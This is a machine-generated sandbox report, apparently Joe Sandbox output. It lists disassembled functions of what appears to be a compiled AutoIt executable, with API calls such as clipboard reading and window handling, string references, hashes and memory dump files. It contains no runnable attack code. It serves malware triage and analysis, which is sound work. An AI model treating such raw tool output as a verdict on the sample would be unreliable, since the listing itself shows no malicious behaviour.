                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                              • String ID: ($,$tooltips_class32
                                                                                              • API String ID: 225202481-3320066284
                                                                                              • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                              • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                              • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                              • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                              Function 0046DCB4 Relevance: 36.2, APIs: 24, Instructions: 247clipboardCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                              • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                              • CloseClipboard.USER32 ref: 0046DD0D
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                              • CloseClipboard.USER32 ref: 0046DD41
                                                                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                              • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                              • CloseClipboard.USER32 ref: 0046DD99
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                              • String ID:
                                                                                              • API String ID: 15083398-0
                                                                                              • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                              • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                              • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                              • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                              Function 00471BC9 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 313windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                              • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                              • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                              • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                              • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                              • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                              • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                              • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                              • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                              • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                              • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                              • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                              • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                              • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                              • String ID: @$AutoIt v3 GUI
                                                                                              • API String ID: 867697134-3359773793
                                                                                              • Opcode ID: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                              • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                              • Opcode Fuzzy Hash: d466945cffb50a7196a7867ec3c7573785653ff52612d7c288cf7d01b72dc8e8
                                                                                              • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                              Function 00433A13 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 196COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                              • API String ID: 1503153545-1459072770
                                                                                              • Opcode ID: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                              • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                              • Opcode Fuzzy Hash: 76acf26b61918e0ebafe3e9c460c5efedcc98b6992261bc6c4f6588f91b2aee1
                                                                                              • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                              Function 00469296 Relevance: 33.4, APIs: 6, Strings: 13, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$__wcsnicmp
                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                              • API String ID: 790654849-32604322
                                                                                              • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                              • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                              • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                              • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                              Function 00455A89 Relevance: 31.9, APIs: 21, Instructions: 395COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                              • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                              • Opcode Fuzzy Hash: 7b3c0986a6774ad4839bdf3b3ab280162fe8917d12771473e04c5712f0602a0a
                                                                                              • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                              Function 00452AC7 Relevance: 31.8, APIs: 21, Instructions: 343COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00442C5A: __time64.LIBCMT ref: 00442C66
                                                                                              • _fseek.LIBCMT ref: 00452B3B
                                                                                              • __wsplitpath.LIBCMT ref: 00452B9B
                                                                                              • _wcscpy.LIBCMT ref: 00452BB0
                                                                                              • _wcscat.LIBCMT ref: 00452BC5
                                                                                              • __wsplitpath.LIBCMT ref: 00452BEF
                                                                                              • _wcscat.LIBCMT ref: 00452C07
                                                                                              • _wcscat.LIBCMT ref: 00452C1C
                                                                                              • __fread_nolock.LIBCMT ref: 00452C53
                                                                                              • __fread_nolock.LIBCMT ref: 00452C64
                                                                                              • __fread_nolock.LIBCMT ref: 00452C83
                                                                                              • __fread_nolock.LIBCMT ref: 00452C94
                                                                                              • __fread_nolock.LIBCMT ref: 00452CB5
                                                                                              • __fread_nolock.LIBCMT ref: 00452CC6
                                                                                              • __fread_nolock.LIBCMT ref: 00452CD7
                                                                                              • __fread_nolock.LIBCMT ref: 00452CE8
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                                                • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                                                • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                                              • __fread_nolock.LIBCMT ref: 00452D78
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                              • String ID:
                                                                                              • API String ID: 2054058615-0
                                                                                              • Opcode ID: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                              • Instruction ID: 04d0e47ed4a2b248740d2851a73093f1b496c65d3ae4d984919b8c0089c9d159
                                                                                              • Opcode Fuzzy Hash: 0fea368d492e8b0ff51cb8fd7897a71ebf5dc00d39f6f8cf48bc83bd06102a16
                                                                                              • Instruction Fuzzy Hash: 6FC14EB2508340ABD720DF65D881EEFB7E8EFC9704F40492FF68987241E6759548CB66
                                                                                              Function 0044870C Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 311COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window
                                                                                              • String ID: 0
                                                                                              • API String ID: 2353593579-4108050209
                                                                                              • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                              • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                              • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                              • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                              Function 0044A032 Relevance: 31.7, APIs: 21, Instructions: 198windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                              • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                              • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                              • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                              • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                              • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                              • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                              • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                              • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                              • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                              • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                              • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                              • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                              • String ID:
                                                                                              • API String ID: 1744303182-0
                                                                                              • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                              • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                              • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                              • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                              Function 00417C20 Relevance: 29.9, APIs: 12, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                              • __mtterm.LIBCMT ref: 00417C34
                                                                                                • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                              • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                              • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                              • __init_pointers.LIBCMT ref: 00417CE6
                                                                                              • __calloc_crt.LIBCMT ref: 00417D54
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                              • API String ID: 4163708885-3819984048
                                                                                              • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                              • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                              • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                              • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                              Function 0046E1A6 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 231COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$\
                                                                                              • API String ID: 0-1896584978
                                                                                              • Opcode ID: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                              • Instruction ID: daa296ce3da71eb1ea4b2d74bac6de3536c6b190185545f0361092b1072d42a3
                                                                                              • Opcode Fuzzy Hash: 0f644335f765ba1f090fa429f6a047d8548bdb555fde32e118ce45ae114b4fa6
                                                                                              • Instruction Fuzzy Hash: 4081B9B1900204ABCB20EB61CD85FDB73ED9F54304F40859EF505AB142EA39EA85CB99
                                                                                              Function 004341E6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 91windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsicoll$IconLoad
                                                                                              • String ID: blank$info$question$stop$warning
                                                                                              • API String ID: 2485277191-404129466
                                                                                              • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                              • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
                                                                                              • Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                              • Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD
                                                                                              Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadIconW.USER32(?,00000063), ref: 0045464C
                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454678
                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00454690
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 00454697
                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004546A8
                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004546AF
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
                                                                                              • GetWindowRect.USER32(?,?), ref: 004546F5
                                                                                              • SetWindowTextW.USER32(?,?), ref: 00454765
                                                                                              • GetDesktopWindow.USER32 ref: 0045476F
                                                                                              • GetWindowRect.USER32(00000000), ref: 00454776
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
                                                                                              • GetClientRect.USER32(?,?), ref: 004547D2
